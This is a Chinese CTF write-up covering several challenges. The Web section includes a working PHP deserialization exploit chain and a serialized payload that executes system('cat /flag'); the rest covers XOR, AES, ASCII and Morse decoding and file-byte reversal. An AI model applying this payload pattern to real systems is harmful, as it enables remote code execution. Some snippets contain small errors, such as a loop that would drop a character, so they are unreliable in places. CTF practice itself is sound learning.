很爽,今年给队内大爷带飞了,希望复赛也能躺
Web
1.ezphp
PHP反序列化,var_dump触发BBB,通过BBB中的param1触发CCC,通过CCC中的$this->func->aaa()触发AAA执行任意代码
exp如下
<?php
highlight_file(___FILE___);
class AAA{
public $cmd;
public function __call($name, $arguments){
eval($this->cmd);
return "done";
}
}
class BBB{
public $param1;
public function __debuginfo(){
return [
'debugInfo' => 'param1' . $this->param1
];
}
}
class CCC{
public $func;
public function __toString(){
var_dump("aaa");
$this->func->aaa();
}
}
// if(isset($_GET['aaa'])){
// $aaa = $_GET['aaa'];
// var_dump(unserialize($aaa));
// }
$ccc = new CCC();
$bbb = new BBB();
$aaa = new AAA();
$aaa->cmd = "system('cat /flag');";
$ccc->func = $aaa;
$bbb->param1 = $ccc;
echo serialize($bbb);
?>
然后提交get参数aaa
?aaa=O:3:"BBB":1:{s:6:"param1";O:3:"CCC":1:{s:4:"func";O:3:"AAA":1:{s:3:"cmd";s:20:"system('cat /flag');";}}}
3.can you read flag
执行命令
tmp目录找到readflag源码
通过readflag源码发现,计算100-200次可以得出flag
RE
1.pyccc
pyc文件,使用逆向软件得到源代码
a = input('please input your flag:\n')
check = [
102,
109,
99,
100,
127,
52,
114,
88,
97,
122,
85,
125,
105,
127,
119,
80,
120,
112,
98,
39,
109,
52,
55,
106]
if len(a) == 24:
for i in range(len(a)):
if check[i] == ord(a[i]) ^ i:
continue
print(yes)
print('nononono')
continue
else:
print('nononono')
发现他是对于每一个上面字符1-24的i值进行异或然后得到flag,那我们可以手动解密得到flag
check=[102,109,99,100,127,52,114,88,97,122,85,125,105,127,119,80,120,112,98,39,109,52,55,106]
flag = ""
for i in range(1,len(check)):
flag = flag + chr(check[i]^i)
print(flag)
#flag{1t_is_very_hap4y!!}
3.easyapk
下载的附件丢到GDA里面反编译 然后找到密文和iv
密钥是,将reversecarefully
中的e换成3
反编译APK,得出加密算法AES/CBC/Pkcs5 秘钥r3v3rs3car3fully IV:0123456789ABCDEF 然后aes解密得出flag
Crypto
1.小小数学家
一串数学题全部解出来68658367847012357100564949514849455056499845521025297455610049974598515698101999910250505653125
使用脚本转ascii码得到flag
s = '68658367847012357100564949514849455056499845521025297455610049974598515698101999910250505653125'
temp = ''
while len(s):
if int(s[:3]) < 127:
temp += chr(int(s[:3]))
s = s[3:]
else:
temp += chr(int(s[:2]))
s = s[2:]
print(temp)
#DASCTF{9d811301-281b-4f4a-8d1a-b38beccf2285}
MISC
1.number game
断点执行
然后赋值
然后停止断点就有个含有flag信息的弹窗
3.Ez_misc
看见一个图,发现有很熟悉的文件头FF 8D FF 0E
对应JPG文件头FF D8 FF E0
用两个脚本处理一下文件
f = open('yuanshen', "rb") # 打开要读取的二进制文件
hex_list = ["{:02X}".format(c) for c in f.read()] # 将文件内容转换为十六进制字符串列表
f.close()
hex_str = ''.join(hex_list) # 将列表中的字符串连接成一个字符串
reversed_hex_str = hex_str[::-1] # 将字符串反转
reversed_bytes = bytes.fromhex(reversed_hex_str) # 将反转后的十六进制字符串转换为字节流
with open('4', 'wb') as f: # 打开一个新的二进制文件,将反转后的字节流写入其中
f.write(reversed_bytes)
with open("4","rb") as f:
a=f.read()[::-1]
with open("5","wb") as new:
new.write(a)
得到jpg图片
对其使用steghide破解,得到flag.txt
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT DASHDASHDOTDOTDOT DASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DASHDASHDASHDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOT
dash和dot一眼摩斯,转换一下
-.... -.... -.... -.-. -.... .---- -.... --... --... -... -.... ....- -.... -.... ...-- ....- -.... -.... ...-- -.... ...-- ...-- ...-- ..... -.... .---- -.... ..--- ...-- ...-- ...-- ....- ...-- ..--- -.... .---- ...-- ..... -.... ..--- ...-- ...-- -.... ..--- -.... ..--- ...-- ---.. ...-- ..... ...-- ..... -.... .---- ...-- ....- ...-- -.... ...-- ....- -.... ....- ...-- --... -.... ..--- -.... ..--- ...-- ....- -.... ..... -.... ...-- --... -..
摩斯解密得到
666C61677B64663466363335616233343261356233626238353561343634643762623465637D
在hex解密得到flag
flag{df4f635ab342a5b3bb855a464d7bb4ec}